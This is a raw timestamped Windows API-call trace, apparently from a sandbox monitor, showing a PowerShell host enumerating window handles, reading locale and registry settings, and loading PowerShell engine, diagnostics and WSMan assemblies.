	[0303.516] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x44c
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x778
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x558
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xc74
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xc1c
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xc08
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xabc
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x24c
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xbb0
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xbfc
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb10
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x374
	[0303.517] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x368
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb28
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xae8
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb14
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x95c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa8c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x46c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb3c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa90
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xad0
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa9c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xaa0
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb1c
	[0303.518] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7e0
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa74
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x694
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa28
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x9b0
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x8d8
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x940
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x93c
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4ec
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x150
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x720
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x3c4
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7d4
	[0303.519] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x6c8
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb54
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb54
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb5c
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x838
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x818
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x5b8
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x494
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x1ec
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x440
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7e8
	[0303.520] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x730
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x2c8
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x31c
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x330
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x128
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x5c8
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x6f8
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x358
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x73c
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb0
	[0303.521] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x250
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x240
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x790
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x61c
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x568
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x538
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x540
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x510
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x79c
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4e0
	[0303.522] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.523] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x778
	[0303.526] WerSetFlags () returned 0x0
	[0303.532] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0303.532] CoTaskMemFree (pv=0x0) 
	[0303.533] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dba0 | out: pulNumLanguages=0x26dba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dba0) returned 1
	[0303.533] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dba8, pwszLanguagesBuffer=0x2d3ab38, pcchLanguagesBuffer=0x26dba0 | out: pulNumLanguages=0x26dba8, pwszLanguagesBuffer=0x2d3ab38, pcchLanguagesBuffer=0x26dba0) returned 1
	[0303.538] CoTaskMemAlloc (cb=0x24) returned 0x16a3a0
	[0303.538] GetUserDefaultLocaleName (in: lpLocaleName=0x16a3a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0303.538] CoTaskMemFree (pv=0x16a3a0) 
	[0304.574] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0304.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.574] CoTaskMemFree (pv=0x1780c0) 
	[0304.577] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0304.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.577] CoTaskMemFree (pv=0x1780c0) 
	[0304.579] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0304.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.579] CoTaskMemFree (pv=0x1780c0) 
	[0304.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.590] SetErrorMode (uMode=0x1) returned 0x1
	[0304.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d820 | out: lpFileInformation=0x26d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0304.590] SetErrorMode (uMode=0x1) returned 0x1
	[0304.590] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26da90 | out: lpdwHandle=0x26da90) returned 0x94c
	[0304.591] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d3e3c8 | out: lpData=0x2d3e3c8) returned 1
	[0304.592] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26da08, puLen=0x26da00 | out: lplpBuffer=0x26da08*=0x2d3e464, puLen=0x26da00) returned 1
	[0304.592] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e540, puLen=0x26d970) returned 1
	[0304.592] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0304.592] CoTaskMemAlloc (cb=0x2e) returned 0x175d20
	[0304.592] lstrcpyW (in: lpString1=0x175d20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0304.592] CoTaskMemFree (pv=0x175d20) 
	[0304.592] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e594, puLen=0x26d970) returned 1
	[0304.592] lstrlenW (lpString="System.Management.Automation") returned 28
	[0304.592] CoTaskMemAlloc (cb=0x3c) returned 0x176b00
	[0304.592] lstrcpyW (in: lpString1=0x176b00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0304.592] CoTaskMemFree (pv=0x176b00) 
	[0304.592] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e5f0, puLen=0x26d970) returned 1
	[0304.592] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.593] CoTaskMemAlloc (cb=0x20) returned 0x170eb0
	[0304.593] lstrcpyW (in: lpString1=0x170eb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.593] CoTaskMemFree (pv=0x170eb0) 
	[0304.593] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e630, puLen=0x26d970) returned 1
	[0304.593] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.593] CoTaskMemAlloc (cb=0x44) returned 0x176b00
	[0304.593] lstrcpyW (in: lpString1=0x176b00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.593] CoTaskMemFree (pv=0x176b00) 
	[0304.593] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e698, puLen=0x26d970) returned 1
	[0304.593] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0304.593] CoTaskMemAlloc (cb=0x76) returned 0x1191b0
	[0304.593] lstrcpyW (in: lpString1=0x1191b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0304.593] CoTaskMemFree (pv=0x1191b0) 
	[0304.593] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e734, puLen=0x26d970) returned 1
	[0304.593] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.593] CoTaskMemAlloc (cb=0x44) returned 0x176b00
	[0304.593] lstrcpyW (in: lpString1=0x176b00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.593] CoTaskMemFree (pv=0x176b00) 
	[0304.593] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e798, puLen=0x26d970) returned 1
	[0304.593] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0304.593] CoTaskMemAlloc (cb=0x58) returned 0xcb700
	[0304.593] lstrcpyW (in: lpString1=0xcb700, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0304.593] CoTaskMemFree (pv=0xcb700) 
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e814, puLen=0x26d970) returned 1
	[0304.594] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.594] CoTaskMemAlloc (cb=0x20) returned 0x170eb0
	[0304.594] lstrcpyW (in: lpString1=0x170eb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.594] CoTaskMemFree (pv=0x170eb0) 
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x2d3e4bc, puLen=0x26d970) returned 1
	[0304.594] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0304.594] CoTaskMemAlloc (cb=0x66) returned 0x16f490
	[0304.594] lstrcpyW (in: lpString1=0x16f490, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0304.594] CoTaskMemFree (pv=0x16f490) 
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x0, puLen=0x26d970) returned 0
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x0, puLen=0x26d970) returned 0
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26d978, puLen=0x26d970 | out: lplpBuffer=0x26d978*=0x0, puLen=0x26d970) returned 0
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d948, puLen=0x26d940 | out: lplpBuffer=0x26d948*=0x2d3e464, puLen=0x26d940) returned 1
	[0304.594] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0304.594] VerLanguageNameW (in: wLang=0x0, szLang=0x114ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0304.594] CoTaskMemFree (pv=0x114ad0) 
	[0304.594] VerQueryValueW (in: pBlock=0x2d3e3c8, lpSubBlock="\\", lplpBuffer=0x26d998, puLen=0x26d990 | out: lplpBuffer=0x26d998*=0x2d3e3f0, puLen=0x26d990) returned 1
	[0304.602] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0304.602] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.602] CoTaskMemFree (pv=0x1780c0) 
	[0304.604] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0304.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.604] CoTaskMemFree (pv=0x1780c0) 
	[0304.605] lstrlenW (lpString="䅁") returned 1
	[0305.641] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d868 | out: phkResult=0x26d868*=0x300) returned 0x0
	[0305.641] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d858 | out: phkResult=0x26d858*=0x304) returned 0x0
	[0305.641] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8e8 | out: phkResult=0x26d8e8*=0x308) returned 0x0
	[0305.643] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d82c, lpData=0x0, lpcbData=0x26d828*=0x0 | out: lpType=0x26d82c*=0x1, lpData=0x0, lpcbData=0x26d828*=0x56) returned 0x0
	[0305.644] CoTaskMemAlloc (cb=0x5a) returned 0x16f420
	[0305.644] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d7fc, lpData=0x16f420, lpcbData=0x26d7f8*=0x56 | out: lpType=0x26d7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d7f8*=0x56) returned 0x0
	[0305.644] CoTaskMemFree (pv=0x16f420) 
	[0305.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.669] CoTaskMemAlloc (cb=0x104) returned 0x1780c0
	[0305.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1780c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.669] CoTaskMemFree (pv=0x1780c0) 
	[0308.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0308.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0309.567] CoTaskMemAlloc (cb=0x104) returned 0x184370
	[0309.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.567] CoTaskMemFree (pv=0x184370) 
	[0309.568] CoTaskMemAlloc (cb=0x104) returned 0x184370
	[0309.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.568] CoTaskMemFree (pv=0x184370) 
	[0310.160] CoTaskMemAlloc (cb=0x104) returned 0x184370
	[0310.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.161] CoTaskMemFree (pv=0x184370) 
	[0310.162] CoTaskMemAlloc (cb=0x104) returned 0x184370
	[0310.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.162] CoTaskMemFree (pv=0x184370) 
	[0310.163] CoTaskMemAlloc (cb=0x104) returned 0x184370
	[0310.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x184370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.163] CoTaskMemFree (pv=0x184370) 
	[0311.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
